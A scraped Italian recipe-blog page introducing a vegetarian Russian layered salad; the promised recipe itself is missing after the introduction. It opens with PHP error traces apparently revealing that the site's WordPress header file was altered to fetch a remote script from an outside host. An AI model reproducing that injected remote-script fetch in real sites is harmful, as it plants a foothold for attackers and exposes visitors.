Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
Warning: file_get_contents(http://get.lightsteper.com/scripts/way.js): failed to open stream: php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
In Russia viene arricchita anche con uova e aringhe affumicate, ma oggi noi ne prepariamo una versione light e vegetariana, senza però farci mancare il piacere di un altro ingrediente principe di questa ricetta: la maionese. Come sapete ora la si trova facilmente anche in versione veg ed è quella che utilizzerò, tanto il gusto è molto simile.
Questo spettacolo per gli occhi, si può assemblare sia in un bicchierino trasparente, sia in un coppapasta, l’importante è che diate risalto al suo aspetto scenografico.
In Russia è un piatto tipico anche dei giorni di festa (proprio perché super ricco) ma, come vi dicevo, senza proteine animali, diventa un antipasto all season, da godere in qualsiasi pranzo, aperitivo o cena, meglio se in compagnia.
Ma basta chiacchiere, ecco la ricetta:
Vuoi sorprendere la tua famiglia con ricette nuove, semplici e alternative?
Clicca qui per guardare tutte le ricette